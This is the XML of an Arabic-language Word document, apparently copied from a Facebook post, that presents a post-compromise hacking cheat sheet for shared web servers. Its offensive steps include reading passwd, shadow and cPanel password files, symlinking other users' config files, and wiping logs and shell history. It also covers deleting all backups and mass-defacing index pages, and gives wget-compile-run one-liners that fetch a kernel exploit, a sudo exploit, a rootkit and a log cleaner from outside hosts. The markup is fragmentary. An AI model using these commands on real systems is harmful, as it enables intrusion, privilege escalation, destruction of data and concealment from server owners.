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CB" w:rsidRPr="002D0BCB" w:rsidRDefault="002D0BCB" w:rsidP="002D0BCB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="141823"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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اوامر كالي لينكس</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D0BCB" w:rsidRPr="002D0BCB" w:rsidRDefault="002D0BCB" w:rsidP="002D0BCB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="141823"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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>cat /etc/passwd | cut -d ":" -f1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إظهار يوزرات المواقع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ls -la /etc/valiases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/etc/passwd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ls /var/mail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/etc/shadow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/etc/domainalias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ln -s / etc/passwd w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يسحب لك الملف بملف أسمه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w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angel.php &lt;------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لحذف ملف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rm -r angel&lt;------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لحذف مجلد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angel.php &lt;------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لعمل بحث عن ملف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*.php &lt;------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لعمل بحث عن جميع الملفات بهذا الامتداد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التأكد من صلاحية سحب الملفات علي السيرفر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which xxxx &lt;------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بدل العلامات بأمر السحب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xxxx =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السحب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اومر السحب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wget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curl -o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get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lynx -source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هذا االامر الي معي حلو يخليك ما تمشور مشوار .... هذا يطلعلك الملفات الي داخل مجلد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boot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تقدر تغيير مجلد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boot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الى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كود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>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cd /boot;ls -al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etc &lt;&lt;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لفحص بعض الملفات ومنها قد تجد ثغرة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confixx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usr &lt;&lt;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لمعرفة برامج السيرفر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opt &lt;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بعض السيرفرات تلقاه بالمجلد الرئيسي بعضها لا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last -20 -a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عرض آخر 20 اسم تم تسجيل دخولهم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ps -ax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عرض الـ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Processess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lsmod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الـ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modules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الموجوده في الكيرنال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uname -a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لعرض معلومات الكرنال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اوامر بسيطه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mv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تغيير الإسم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cp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نسخ ملف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cp -R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نسخ مجلد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ln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إنشاء رابط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( link )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لملف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gerp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البحث داخل ملف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لو اردت معرفة هل البورت مفتوح11457 راح اطبق التالي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netstat -an|grep 11457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lastRenderedPageBreak/>
        <w:t>---------------------------------------------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امر للتاكد من وجود ملف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كود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>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ls file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حلو بدل ما تكتب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ls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ويطلع لك ملفات وتخش عيونك على بعض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ويمكن تستخدمه للتاكد من وجوده ومعرفه التصريح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كود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>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ls -al file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أوامر إحترافيه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إظهار اليوزرات بشكل مرتب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awk -F: '{ print $1 }' / etc/passwd | sort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2-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معرفة البرامج المستخدمه من قبل اليوزر والرووت ( من ضمنها اسم برنامج الاف تي بي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ps -o "%u : %U : %p : %a"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3-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معلومات كامله واحترافيه عن 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processess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مع تحديد اليوزر المستخدم للبروسيس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ps -eo pid,tt,user,fname,tmout,f,wchan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4-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processess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ليوزر معين ؟ ( استبدل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user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فقط في هذا الأمر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ps -U user -u user -N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5-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اليوزرز المتصلين الآن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users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6-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عرض آخر اليوزرز اللي دخلو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last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7-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لجلب معلومات عن مستخدم معين ( استبدل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user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في هذا الأمر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finger user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8-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امر معرفة اسماء اليوزرز المتصلين بالسيرفر .. وافعالهم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w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9-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عرض البورتات المفتوحه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netstat -lnp --ip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touch angel.php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ينشئ لك ملف ضمن المجلد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++g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كومبيلر لل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C++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C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gcc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كومبيلر لل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C++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C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grep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يستخدم للبحث عن شئ داخل ملف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gzip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لضغط ملفات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gunzip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لضغط ملفات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un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لفك الضغط بالاستعانه مع الاوامر اللي فوق مثال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 ungzip unzip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haltsys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لاغلاق النظام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cat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لعرض محتوى اكثر من ملف مع بعض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cd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لتغير الدليل الذي انت عليه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chmod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لتغير تصريح دخلول ملف معين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chown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لتغير مالك ملف معين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clear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لمسح كل الذي على الشاشة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cmp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لمقارنة ملفين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cp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لنسخ الملفات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crypt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لتشفير و فك تشفير الملفات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csplit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لتقسيم الملف الى عدة ملفات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cu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لطلب تريمنال يونكس اخر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whoami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يقول لك من انت (يعني من انا ) يقول لك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root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او مستخدم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xxx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rm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لمسح ملفات او مجلدات ( خاليه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rmdir :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لمسح مجلد ( خالي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وفي حال كنت بالترمنال اضغط على زر التاب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Tap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يعرض لك كل اوامر اللينكس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lastRenderedPageBreak/>
        <w:t>ومثلاً اي امر تحب تعرف شو هووا فقط اكتب الأمر وبعدها هيلب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مثال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rm --help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أوامر رائعه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لمعرفة جميع ملفات اسم مستخدم معين ( استبدل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john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/home -user john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لمعرفة الملفات اللتي تم تعديلها في خلال الـ 24 ساعه ( أمر مهم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$HOME -mtime 0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لمعرفة المساحه المستخدمه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df -h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لمعرفة المساحه المتبقيه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du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وهذي مجموعة من الأوامر البسيطة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ls -m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يظهر الملفات مع تفريقهم بفواصل بدلا من تفريقهم بخانات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ls -t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يظهر الملفات حسب تواريخ إنشائها يعني من الجديد إلى القديم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ls -lu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يظهر الملفات حسب آخر تاريخ زيارة لهذه الملفات (مع تبيين هذا التاريخ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>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ls -F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يظهر الملفات بأنواعها حيث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الملفات المسبوقة ب / عبارة عن مجلدات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الملفات المسبوقة ب * عبارة عن ملفات تنفيذية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الملفات المسبوقة ب @ عبارة عن روابط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ls -S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يظهر الملفات تسلسليا من الأكبر إلى الأصغر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ls -X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يظهر الملفات ويرتبها حسب امتدادها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ls -r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يظهر الملفات مرتبة بالمقلوب (يعني من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z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ثم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y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ثم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x ....)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cp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لنسخ ملف أو مجلد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mkdir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لإنشاء مجلد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mv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لتحويل ملف من مجلد إلى مجلد أو إعادة تسميته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(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مثلا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mv angel gnom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راح يعيد تسميت المجلد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angel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إلى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gnom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mv angel.php /ho me/hackteach/publi c_htm l/cc/test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راح يحول الملف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angel.php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من المجلد إلي هو فيه إلى المجلد الجديد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test)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ln -sf / home / user / public_html / vb / in clude s / c onfig . php conf.txt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راح يجيب لك نسخـة من ملف الكونفق تبع اليوزر المحدد في الملف الجديد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conf.txt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بالعربي ,, الأمر هذا هو حق السم لينك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,, symLink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لمعرفة اليوزر اللي مستهلك أكبر مساحه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du -s / home | sort -rn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(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بدون مسافه بعد / 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home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lastRenderedPageBreak/>
        <w:t>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النسخ واللصق بهالطريقة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 p /ho me/hi.t xt /ho me/jack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أو العكس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لعمل ماس ديفاس بعد اخذ الروت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كود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PHP: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"index.*" -exec cp /t mp/index.htm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إظهار باسوردات السي بانل ( في حالة كنت روت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 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في أوامر كثيره .. بعضها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service.pwd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home/*/public_html/_vti_pvt/service.pwd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var/cpanel/accounting.log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(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لاتنسى تحذف المسافات قبل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var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home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حذف ملفات اللوقو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tmp/logs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$HISTFILE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root/.ksh_history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root/.bash_history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root/.ksh_history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root/.bash_logout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usr/local/apache/logs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usr/local/apache/log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var/apache/logs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var/apache/log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var/run/utmp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var/logs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var/log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var/adm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etc/wtmp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rm -rf / etc/utmp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*.bash_history -exec rm -rf {} \;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*.bash_logout -exec rm -rf {} \;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"log*" -exec rm -rf {} \;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*.log -exec rm -rf {} \;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2-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تعديل ملفات اللوقو ( إخفائها .. آمن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var/log/kdebug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var/log/kernel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var/log/maillog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var/log/messages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var/log/secure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var/log/svclog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var/log/tcdebuglog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var/log/tclient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var/log/tivoLog.prv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var/log/tivoLog.pub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lastRenderedPageBreak/>
        <w:t>cat / dev/null &gt; / var/log/tivoweb.log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var/log/tvdebuglog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var/log/tverr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dev/null &gt; / var/log/tvlog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3-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قرائة ملف الكونفيج على السيرفر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usr/local/apache/conf/httpd.conf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4-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 الملفات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Suid (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ملفات من قبل الروت لكن يستطيع اليوزر تشغيلها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-type f -perm -04000 -ls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5-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 الملفات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Sgid (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ملفات من قبل الروت لكن تستطيع المجموعه تشغيلها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-type f -perm -02000 -ls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6-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أوامر عرض المجلدات المصرح لها تصريح 777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-perm -2 -ls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-type d -perm 0777 | xargs ls -alld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-type d -pem -2 -ls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7-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حذف جميع الباك آب الموجوده على السيرفر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"cpbackup*" -exec rm {} ;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"backup*" -exec rm {} ;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8-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إستبدال جميع الإندكسات إلى الإندكس الموجود على المسار الحالي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"index.*" -exec cp index.htm {} ;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"default.*" -exec cp index.htm {} ;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9-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تعديل صلاحيات الإندكسات إلى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nobody (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لكي لا يشك اليوزر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"index.*" -exec chown 99 index.html {} ;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"default.*" -exec chown 99 index.html {} ;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10-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System log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etc/syslog.conf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11-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 معلومات عن الذاكره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proc/meminfo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12-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تعديل دوال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php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والسيف مود وغيرها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pico / usr/local/lib/php.ini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13-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 البورتات المفتوحه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netstat -atup | grep IST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14-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 آخر إتصال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lastlog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15-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 اليوزرات المتصله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w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16-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لمعرفة إصدار الكيرنال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dpkg --list | grep linux-image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rpm -q kernel : kernel-2.6.18-53.1.4.el5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uname -s : SunOS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uname -r : 2.6.22-14-EL5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uname -mrsn : Linux </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="002D0BCB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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>s.server.com</w:t>
        </w:r>
      </w:hyperlink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> 2.6.18-53.1.4.el5 x86_64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proc/version : Linux version 2.6.18-53.1.4.el5 (b@redhat.com) (gcc version 4.1.2 20070626 (Red Hat 4.1.2-14)) #1 SMP Wed Nov 14 1027 EST 2007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17-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إيقاف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process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معين عن العمل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kill -9 PID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kill PID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مع إستبدال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PID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لرقم البروسيس .. تستطيع معرفته عن طريق الأمر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ps ux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ps aux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lastRenderedPageBreak/>
        <w:t>top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18-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 الأوامر ( او بالأصح الملفات التنفيذيه ) اللتي عليها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Suid (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يستطيع اليوزر تشغيلها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bin / usr/bin / usr/local/bin / sbin / usr/sbin / usr/local/sbin -perm -4000 2&gt; / dev/null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19-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 اليوزرات اللتي لا تحتوي على باسورد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cut -d: -f1,2,3 / etc/passwd | grep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20-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 الملفات اللتي تريد الكتابه عليها في مجلد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etc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etc/ -type f -perm -o+w 2&gt; / dev/null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21-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 أوامر السحب المفعله كـ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wget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which wget curl w3m lynx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22-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 معلومات عن المعالج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CPUINFO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cat / proc/version / proc/cpuinfo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23-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عرض مساحات الهاردسك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du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(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ملاحظه : تستطيع إستخدامه مع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option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اخرى .. لاحظ الأوامر التاليه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du -s / home/user | sort -rn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df -Th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24-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التأكد من وجود المترجم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gcc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locate gcc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25-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إستخدام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Wipelogs (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للتعديل على الوقو .. أمن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wget No Results Found Packet Storm | gcc zap2.c -o zap2 | ./zap2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26-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تنفيذ بعض الهجمات على الكيرنال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wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="002D0BCB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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://ftp.powernet.com.tr/supermail/debug/k3</w:t>
        </w:r>
      </w:hyperlink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>| ./k3 1 | ./k3 2 | ./k3 3 | ./k3 4 | ./k3 5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27-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إستخدام ثغرة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stack overflow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عن طريق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sudo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wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="002D0BCB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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://precision-gaming.com/sudo.c</w:t>
        </w:r>
      </w:hyperlink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> | gcc sudo.c -o sudosploit | ./sudosploit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28-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تثبيت روت كت لإصدار 2.6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wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="002D0BCB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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>twofaced.org</w:t>
        </w:r>
      </w:hyperlink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> | gcc linux2-6-all.c -o linuxkernel | ./linuxkernel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29-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استخدام سكربت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Mig LogCleaner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wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="002D0BCB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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>twofaced.org</w:t>
        </w:r>
      </w:hyperlink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> | gcc -DLINUX -WALL mig-logcleaner.c -o migl | ./migl -u root 0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30-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لمعرفة الملفات والمجلدات اللتي تم تعديلها في خلال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X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يوم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-mtime x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(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ملاحظه : استبدل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time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إلى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min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للبحث في الدقائق .. ليصلح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mmin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31-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أمر لمعرفة الملفات والمجلدات اللتي تم تعديل خصائصها ( كـ الملكيه ) في خلال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X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يوم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-ctime x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32-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للبحث عن الملفات اللتي مالكها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root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لكن يستطيع اليوزر تنفيذها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-perm +4000 -user root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33-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للبحث عن الملفات اللتي مالكها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root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لكن يستطيع اليوزر الكتابه عليها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-perm +002 -user root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34-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للبحث عن الملفات اللتي ليس لديها مالك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-nouser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35-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للبحث عن الملفات اللتي مالكها هو اليوزر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root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-user root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36-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من الأوامر التفصيليه لـ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find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find / -name "*.txt" -size +10k -user root -not -perm +o=r -exec chmod o+r {} \;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شرح الأمر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ابحث في جميع المجلدات .. عن اي ملف نصي امتداده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txt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وحجمه أكثر من 10 كيلو بايت .. وصاحبه اليوزر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root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وغير قابله للقراءه من اي يوزر اخر ماعدا مالكها الأصلي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يستطيع صاحبها قرائتها وويستطيع تنفيذها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( execution ) (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ورمزه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-r-xr--r-- )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>----------------------------------------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  <w:t xml:space="preserve">37-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وتستطيع إستخدام أمر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find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بشكل آخر .. مثل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: find / -type f \( -perm -04000 -o -perm -02000 \) \-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lastRenderedPageBreak/>
        <w:t xml:space="preserve">exec ls -lg {} \;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شرح الأمر : عرض جميع الملفات فقط .. اللتي لديها خاصيتي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SetUID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و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t xml:space="preserve"> SetGID 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  <w:rtl/>
        </w:rPr>
        <w:t>بشكل مفصل</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0BCB">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="141823"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="002D0BCB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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://ftp.powernet.com.tr/supermail/debug/k3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00937323" w:rsidRPr="002D0BCB" w:rsidRDefault="00937323">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00937323" w:rsidRPr="002D0BCB" w:rsidSect="00F80D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C8"/>
    <w:rsid w:val="002D0BCB"/>
    <w:rsid w:val="00920CD2"/>
    <w:rsid w:val="00937323"/>
    <w:rsid w:val="00F03EC8"/>
    <w:rsid w:val="00F8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2D0BCB"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D0B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2D0BCB"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D0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twofaced.org%2F&amp;h=eAQFyeAqK&amp;enc=AZMlX9Ay_GSMzR-tnWcPWpZ57SjpZzfbrYLr049aQk3TOLdKs1rkMSoG6AYFKpDFF2W4dl6QBLuwAHRDjAhIaaGF8sCCejVIrCX7qWpS_a2KV97iaQLhdNBBiQ7lHJj_GqkES67E7mZi1bltfsWWf-B6&amp;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.facebook.com/l.php?u=http%3A%2F%2Fprecision-gaming.com%2Fsudo.c&amp;h=yAQF_Vf7l&amp;enc=AZPdbQKhtIS9o1rV-3Eyto1TGyJ3PDTkvuZwjmXo66nxZ5qKP1sudXIH2CjFtZ7IHm6WRXbA8eh-wo5fAEmOk6yBhOn0HMqAev3OWfnZHtSFxoVt0BurfpwcFjPVcqqXxgSlcZydz_T27XY7GDw3LVL9&amp;s=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.facebook.com/l.php?u=http%3A%2F%2Fftp.powernet.com.tr%2Fsupermail%2Fdebug%2Fk3&amp;h=KAQGi3Nyh&amp;enc=AZMWs5mhfUCm9lvZQPrPFSFMWBIuSVc8WxjYw9ST_rj-8tQ7yfwu3YMWI-ocIhZEFUXFfPTNbo7w5JmDtXiFcXvaNISkdravfqyJ58FpbbLUUunG7Uck4yCBWfmF7d1pYS6hohw0LytjXgObUd6AnFkS&amp;s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.facebook.com/l.php?u=http%3A%2F%2Fs.server.com%2F&amp;h=LAQEN4D65&amp;enc=AZMQqsbyqfb5GFaKN5jycT_fR1vyThKK6MBLucD_XwJi3ucJAdGsDacDEeMb7uegIQk7f6Pa6kaqvRJj206fjmaQXlmYEiQuU52dOhZAAAfcBrcsHxi9RXXCvhWawPfn0jVEpCbRvj40t3o8advroKEe&amp;s=1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://l.facebook.com/l.php?u=http%3A%2F%2Fftp.powernet.com.tr%2Fsupermail%2Fdebug%2Fk3&amp;h=yAQF_Vf7l&amp;enc=AZPYfYrRfFRNKCnnn8sQQe4HwjbGWWIyVVdFyTS4jWkxWOyPUVxMVlhz8KonxXLQAaa5MWRe4cFekmv-uh1WHJhV1a5A_t2M2KM6uKwyFIOhyASVoryXYd0S74GWqRegPsM7XABHnH4lTQ50hmtokYZz&amp;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.facebook.com/l.php?u=http%3A%2F%2Ftwofaced.org%2F&amp;h=LAQEN4D65&amp;enc=AZML6d02BxkAsIwfZHynyaZzlX0VbOk-1Juw9l7dHO5IzOqJcKYzY_iyYQUWe1hyJTfemJLZdFH30aVvgEvU8GCJTLtySB5nkP4WfwR89JxICHXtQM6HsVvieP5WyUjcuNrjqphb6twDUSexN1nfVjym&amp;s=1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1822</Words>
  <Characters>10386</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>86</Lines>
  <Paragraphs>24</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Naim Al Hussaini</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12184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نزار اديب العزعزي</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>نزار اديب العزعزي</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-25T20:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-25T20:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>